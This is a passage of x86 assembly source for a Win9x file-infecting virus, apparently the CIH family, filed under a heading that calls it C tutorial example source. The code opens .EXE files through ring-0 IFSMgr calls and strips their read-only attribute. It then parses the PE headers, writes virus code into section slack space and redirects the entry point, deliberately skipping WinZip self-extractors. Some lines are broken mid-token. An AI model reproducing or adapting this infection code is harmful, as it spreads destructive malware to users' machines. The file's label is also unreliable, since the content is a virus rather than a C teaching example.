046.c

C语言实战105例源码

; ************************************* 
; * Is FileName '.EXE' !? * 
; ************************************* 

; cmp [esi+eax-04h], '.EXE' 
cmp [esi+eax-04h], 'EXE.' 
pop esi 
jne DisableOnBusy 

IF DEBUG 

; ************************************* 
; * Only for Debug * 
; ************************************* 

; cmp [esi+eax-06h], 'FUCK' 
cmp [esi+eax-06h], 'KCUF' 
jne DisableOnBusy 

ENDIF 

; ************************************* 
; * Is Open Existing File !? * 
; ************************************* 

; if ( NotOpenExistingFile ) 
; goto DisableOnBusy 
cmp word ptr [ebx+18h], 01h 
jne DisableOnBusy 

; ************************************* 
; * Get Attributes of the File * 
; ************************************* 

mov ax, 4300h 
int 20h ; VXDCall IFSMgr_Ring0_FileIO 
IFSMgr_Ring0_FileIO = $ 
dd 00400032h 

jc DisableOnBusy 

push ecx 

; ************************************* 
; * Get IFSMgr_Ring0_FileIO Address * 
; ************************************* 

mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi] 
mov edi, [edi] 

; ************************************* 
; * Is Read-Only File !? * 
; ************************************* 

test cl, 01h 
jz OpenFile 

; ************************************* 
; * Modify Read-Only File to Write * 
; ************************************* 

mov ax, 4301h 
xor ecx, ecx 
call edi ; VXDCall IFSMgr_Ring0_FileIO 

; ************************************* 
; * Open File * 
; ************************************* 

OpenFile: 
xor eax, eax 
mov ah, 0d5h 
xor ecx, ecx 
xor edx, edx 
inc edx 
mov ebx, edx 
inc ebx 
call edi ; VXDCall IFSMgr_Ring0_FileIO 

xchg ebx, eax ; mov ebx, FileHandle 

; ************************************* 
; * Need to Restore * 
; * Attributes of the File !? * 
; ************************************* 

pop ecx 

pushf 

test cl, 01h 
jz IsOpenFileOK 

; ************************************* 
; * Restore Attributes of the File * 
; ************************************* 

mov ax, 4301h 
call edi ; VXDCall IFSMgr_Ring0_FileIO 

; ************************************* 
; * Is Open File OK !? * 
; ************************************* 

IsOpenFileOK: 
popf 

jc DisableOnBusy 

; ************************************* 
; * Open File Already Succeed. ^__^ * 
; ************************************* 

push esi ; Push FileNameBuffer Address to Stack 

pushf ; Now CF = 0, Push Flag to Stack 

add esi, DataBuffer-@7 ; mov esi, offset DataBuffer 

; *************************** 
; * Get OffsetToNewHeader * 
; *************************** 

xor eax, eax 
mov ah, 0d6h 

; For Doing Minimal VirusCode's Length, 
; I Save EAX to EBP. 
mov ebp, eax 

push 00000004h 
pop ecx 
push 0000003ch 
pop edx 
call edi ; VXDCall IFSMgr_Ring0_FileIO 

; * EDX = 'PE\0\0' Signature of * 
; * ImageFileHeader Pointer's * 
; * Former Byte. * 
; * ESI = DataBuffer Address ==> @8 * 
; * EDI = IFSMgr_Ring0_FileIO Address * 
; * EBP = D600h ==> Read Data in File * 
; ************************************* 
; * Stack Dump : * 
; * * 
; * ESP => ------------------------- * 
; * | EFLAG(CF=0) | * 
; * ------------------------- * 
; * | FileNameBufferPointer | * 
; * ------------------------- * 
; * | EDI | * 
; * ------------------------- * 
; * | ESI | * 
; * ------------------------- * 
; * | EBP | * 
; * ------------------------- * 
; * | ESP | * 
; * ------------------------- * 
; * | EBX | * 
; * ------------------------- * 
; * | EDX | * 
; * ------------------------- * 
; * | ECX | * 
; * ------------------------- * 
; * | EAX | * 
; * ------------------------- * 
; * | Return Address | * 
; * ------------------------- * 
; ************************************* 

push ebx ; Save File Handle 

push 00h ; Set VirusCodeSectionTableEndMark 

; *************************** 
; * Let's Set the * 
; * Virus' Infected Mark * 
; *************************** 

push 01h ; Size 
push edx ; Pointer of File 
push edi ; Address of Buffer 

; *************************** 
; * Save ESP Register * 
; *************************** 

mov dr1, esp 

; *************************** 
; * Let's Set the * 
; * NewAddressOfEntryPoint * 
; * ( Only First Set Size ) * 
; *************************** 

push eax ; Size 

; *************************** 
; * Let's Read * 
; * Image Header in File * 
; *************************** 

mov eax, ebp 
mov cl, SizeOfImageHeaderToRead 
add edx, 07h ; Move EDX to NumberOfSections 
call edi ; VXDCall IFSMgr_Ring0_FileIO 

; *************************** 
; * Let's Set the * 
; * NewAddressOfEntryPoint * 
; * ( Set Pointer of File, * 
; * Address of Buffer ) * 
; *************************** 

lea eax, (AddressOfEntryPoint-@8)[edx] 
push eax ; Pointer of File 

lea eax, (NewAddressOfEntryPoint-@8)[esi] 
push eax ; Address of Buffer 

; *************************** 
; * Move EDX to the Start * 
; * of SectionTable in File * 
; *************************** 

movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi] 
lea edx, [eax+edx+12h] 

; *************************** 
; * Let's Get * 
; * Total Size of Sections * 
; *************************** 

mov al, SizeOfScetionTable 

; I Assume NumberOfSections <= 0ffh 
mov cl, (NumberOfSections-@8)[esi] 

mul cl 



; *************************** 

; * Let's Set Section Table * 

; *************************** 

; Move ESI to the Start of SectionTable 
lea esi, (StartOfSectionTable-@8)[esi] 

push eax ; Size 
push edx ; Pointer of File 
push esi ; Address of Buffer 

; *************************** 
; * The Code Size of Merge * 
; * Virus Code Section and * 
; * Total Size of Virus * 
; * Code Section Table Must * 
; * be Small or Equal the * 
; * Unused Space Size of * 
; * Following Section Table * 
; *************************** 

inc ecx 
push ecx ; Save NumberOfSections+1 

shl ecx, 03h 
push ecx ; Save TotalSizeOfVirusCodeSectionTable 

add ecx, eax 
add ecx, edx 

sub ecx, (SizeOfHeaders-@9)[esi] 
not ecx 
inc ecx 

; Save My Virus First Section Code 
; Size of Following Section Table... 
; ( Not Include the Size of Virus Code Section Table ) 
push ecx 

xchg ecx, eax ; ECX = Size of Section Table 

; Save Original Address of Entry Point 
mov eax, (AddressOfEntryPoint-@9)[esi] 
add eax, (ImageBase-@9)[esi] 
mov (OriginalAddressOfEntryPoint-@9)[esi], eax 

cmp word ptr [esp], small CodeSizeOfMergeVirusCodeS 
tion 
jl OnlySetInfectedMark 

; *************************** 
; * Read All Section Tables * 
; *************************** 

mov eax, ebp 
call edi ; VXDCall IFSMgr_Ring0_FileIO 

; *************************** 
; * Full Modify the Bug : * 
; * WinZip Self-Extractor * 
; * Occurs Error... * 
; *************************** 
; * So When User Opens * 
; * WinZip Self-Extractor, * 
; * Virus Doesn't Infect it.* 
; *************************** 
; * First, Virus Gets the * 
; * PointerToRawData in the * 
; * Second Section Table, * 
; * Reads the Section Data, * 
; * and Tests the String of * 
; * 'WinZip(R)'...... * 
; *************************** 

xchg eax, ebp 

push 00000004h 
pop ecx 

push edx 
mov edx, (SizeOfScetionTable+PointerToRawData-@9)[e 
] 
add edx, 12h 

call edi ; VXDCall IFSMgr_Ring0_FileIO 

; cmp [esi], 'nZip' 
cmp dword ptr [esi], 'piZn' 
je NotSetInfectedMark 

pop edx 

; *************************** 
; * Let's Set Total Virus * 
; * Code Section Table * 
; *************************** 

; EBX = My Virus First Section Code 
; Size of Following Section Table 
pop ebx 
pop edi ; EDI = TotalSizeOfVirusCodeSectionTabl 
pop ecx ; ECX = NumberOfSections+1 

push edi ; Size 

add edx, ebp 
push edx ; Pointer of File 

add ebp, esi 
push ebp ; Address of Buffer 

; *************************** 
; * Set the First Virus * 
; * Code Section Size in * 
; * VirusCodeSectionTable * 
; *************************** 

lea eax, [ebp+edi-04h] 
mov [eax], ebx 

; *************************** 
; * Let's Set My Virus * 
; * First Section Code * 
; *************************** 

push ebx ; Size 

add edx, edi 
push edx ; Pointer of File 

lea edi, (MyVirusStart-@9)[esi] 
push edi ; Address of Buffer 

; *************************** 
; * Let's Modify the * 
; * AddressOfEntryPoint to * 
; * My Virus Entry Point * 
; *************************** 

mov (NewAddressOfEntryPoint-@9)[esi], edx 

; *************************** 
; * Setup Initial Data * 
; *************************** 

lea edx, [esi-SizeOfScetionTable] 
mov ebp, offset VirusSize 

jmp StartToWriteCodeToSections 

; *************************** 
; * Write Code to Sections * 
; *************************** 

LoopOfWriteCodeToSections: 

add edx, SizeOfScetionTable 

mov ebx, (SizeOfRawData-@9)[edx] 
sub ebx, (VirtualSize-@9)[edx] 
jbe EndOfWriteCodeToSections 

push ebx ; Size 

sub eax, 08h 
mov [eax], ebx 

mov ebx, (PointerToRawData-@9)[edx] 
add ebx, (VirtualSize-@9)[edx] 
push ebx ; Pointer of File 

push edi ; Address of Buffer 

mov ebx, (VirtualSize-@9)[edx] 
add ebx, (VirtualAddress-@9)[edx] 
add ebx, (ImageBase-@9)[esi] 
mov [eax+4], ebx 

mov ebx, [eax] 
add (VirtualSize-@9)[edx], ebx 

; Section contains initialized data ==> 00000040h 
; Section can be Read. ==> 40000000h 
or (Characteristics-@9)[edx], 40000040h 

StartToWriteCodeToSections: 

sub ebp, ebx 
jbe SetVirusCodeSectionTableEndMark 

add edi, ebx ; Move Address of Buffer 

EndOfWriteCodeToSections: 

loop LoopOfWriteCodeToSections 

; *************************** 
; * Only Set Infected Mark * 
; ***************************